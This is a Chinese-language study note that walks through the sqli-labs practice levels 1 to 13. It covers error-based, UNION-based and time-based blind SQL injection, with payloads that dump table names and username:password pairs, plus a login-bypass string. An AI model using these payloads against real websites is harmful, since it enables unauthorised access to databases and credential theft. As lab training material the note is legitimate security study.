sqli-labs学习笔记

Less-1

1-2关 基于错误的字符串/数字型注入

一、找漏洞

用 and 1=1/1=2判断整形类型，加单引号判断字符串和整形类型）

这题就是?id=1(数字随便输）输入?id=1 and 1=1 以及输入 ?id=1 and 1=2发现并有什么什么变化

当输入?id=1时

页面不报错

当输入?id='时

页面出现报错语句 ，当输入单引号时，页面由正常页面变为报错页面，可以判断时单引号注入漏洞

二、猜解字段数

字段数可能时sql数据库中的变量

确定字段数是因为知道了准确的字段数才可以用union来进行操作获取你想要的东西，因为union select ...后面的字段必须与数据库的字段相对应，就是假设你数据库里有3个字段，但是你输入union select 1,2你会发现会报错在这题中，必须对应三个数字 union select 1,2,3才能够成功执行，所以这才需要order by 来知道字段数从而使用union

输入?id=1' order by 4 --+(--+为注释语句）发现报错

 输入?id = 1' order by 3 --+

页面正常，说明字段数为3。

三、获取数据库名字

知道了数据库字段数后，利用union来获取数据库名字，数据表名字，字段名以及字段名对应的数据信息。这里会先使id=-1'，为什么呢，前面已经找了SQL注入漏洞出现报错，那么先要让其存在一个合理的报错形式 ，然后把后面的SQL语句也带进SQL里进行执行操作，从而获取信息。所以就是得让union 前面的为正确的报错行为，在id=1'添加符号，id默认为从0开始所以这是错的吧 或者直接在后面加个and 1=2也是错的吧，and 1=1就不可以了，因为这是正确语句不会报错对吧。这样的话union语句就可以正确执行进去了

输入 ?id=1' and 1=2 union select 1,2,3 --+  然后回车就发现显示了2,3，这意味着2,3字段是可以回显到页面的，可以进行操作，那我直接更改3这个位置代码

进入下面的操作前，先介绍几个函数：

　　（1）version（）：查看数据库版本

　　（2）user（）：查看当前用户

　　（3）database（）：查看使用的数据库

　　（4） limit  :limit子句来分批获取所有数据

　　（5）group_concat（）：一次性获取数据库信息。

查询用户，查询数据库，查询数据库版本

输入union select 1,2,user()--+看了下用户名

输入union select 1,2,database(0--+看了下使用得数据库（重点）

输入union select 1,2,version()--+看了下数据库版本

 

 四、查表

想知道用户名和密码 必须先知道数据库

输入 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

我对这句代码理解认为 group_concat(table_name)这个就是合并到一起来显示表名，from information_shchema.tables这是固定的，字面理解就是来自信息图表数据库的存在的表单，然后 where 限制语句 where table_schema='security'只需要查找数据库名为security.找到了显示出所有表单，发现了有users表单，这里就应该会有我们想要的用户密码

 五、查字段名以及字段数值

接着输入 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()--+

然后就获取了表单里的字段名 发现了有username 和 password 

输入 union select 1,2,group_concat(username,0x3a,password) from users--+

就可以得到每个用户名对应的密码（0x3a是字符冒号':'对应的16进制的ASCII码）

 

Less-3

一、判断注入类型

首先判断是数字型注入还是字符型注入

输入?id=1 查看回显

输入?id=1'

 输入?id=1"

 输入单引号时页面异常，输入双引号时页面正常   从回显的信息看来，它是由’)来进行闭合的，所以我们尝试输入’)进行闭合再输入–+注释掉后面的代码，结果显示页面正常显示。由此可推出参数是’)进行闭合的！此时可以输入and 1=1 和and 1=2来比较

输入?id=1' and 1=1

输入?id=1') and 1=2

此时证明了上述假设的闭合方式 

二、猜解字段数

使用order by

输入?id=1' order by 4 --+(--+为注释语句）发现报错

输入?id=1') order by 3 --+

页面正常，说明字段数为3

其余注入与第一题相同

Less-4

一、找漏洞

输入?id=1查看回显

第四关使用（“”）的方式闭合字符串

 当输入?id=1"时，页面显示错误

 输入?id= 1"） and 1=2 union select 1,2,3 --+页面正常

其余注入与第一题相同

Less-5

一、找漏洞

输入?id= 1查看回显

 输入?id= 1'页面报错

输入?id=1' union select 1,2,3 --+页面显示

无法进行下一步

需要用到新的知识

时间延迟型注入手工注入

时间延迟型手工注入，正确会延迟，错误没有延迟。可以通过浏览器的刷新提示观察延迟情况，但是id正确的时候的回显有利于观察。

我们构造sql语句，带上时间延迟的函数，如果有明显的延迟说明有注入点。

?id=1’ and if(length(database())=n,sleep(5),1)--+

当n为8时，出现明显的延迟，说明有注入点

猜库名

数据库第一个字符为s，加下来以此增加left(database(),字符长度)中的字符长度，等号右边以此爆破下一个字符，正确匹配时会延迟。最终爆破得到left(database(),8)='security'

?id=1' and if(left(database(),1)='s',sleep(5),1)--+

猜表名

?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users',sleep(5),5)--+

经过几次尝试找到了表名。

猜列名

?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password',sleep(5),1)--+

首先尝试定向爆破，以提高手工注入速度，修改limit x,1 中的x查询password是否存在表中，lucky的是limit 3,1的时候查到了password列，同样的方法查询username ，又一个lucky

猜值

?id=1’ and if(left((select password from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1)–+

?id=1’ and if(left((select username from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1)–+

按照id排序，这样便于对应。注意limit 从0开始.通过坚持不懈的尝试终于爆破到第一个用户的名字dumb，密码dumb，需要注意的是，mysql对大小写不敏感，所以你不知道是Dumb 还是dumb

到这里建议使用sqlmap 

Less-6

查询了第一个，输入的id使用“包裹，其余和第五关一致
所以只需要我们换成双引号即可

Less-7

Less-8

首先输入?id=1 查看回显，发现除了输入?id=1时显示you are in ... 别的都不显示

 可以使用盲注

输入?id=1' and if(length(database())=8,sleep(5),1) --+ 页面出现延迟五秒 说明数据库长度为8

 其余步骤和Less-5相同

Less-9

首先输入?id=1查看回显，发现无论输入说明 都是显示you are in ...

 可以使用时间盲注，同Less-5 Less-8

Less-10

个人认为Less-10和Less-9相同，无论输什么都不动，区别就在于Less-9是基于单引号的时间注入

Less-10是基于双引号的时间注入

Less-11

 第十一关开始进入登录框这种模式，像登陆框这种模式也是可以当成sql语句注入

使用万能密码时可以登录
admin' or 1 #)
是一个dump用户，当然admin也可以登录

 使用burp

输入admin' order by 3 报错

 输入admin' order by 2 --+ 正确

发现1,2可以回显 正常查询即可

 Less-12

输入admin")发现闭合

其余同十一关

Less-13

单引号报错，发现可以闭合，')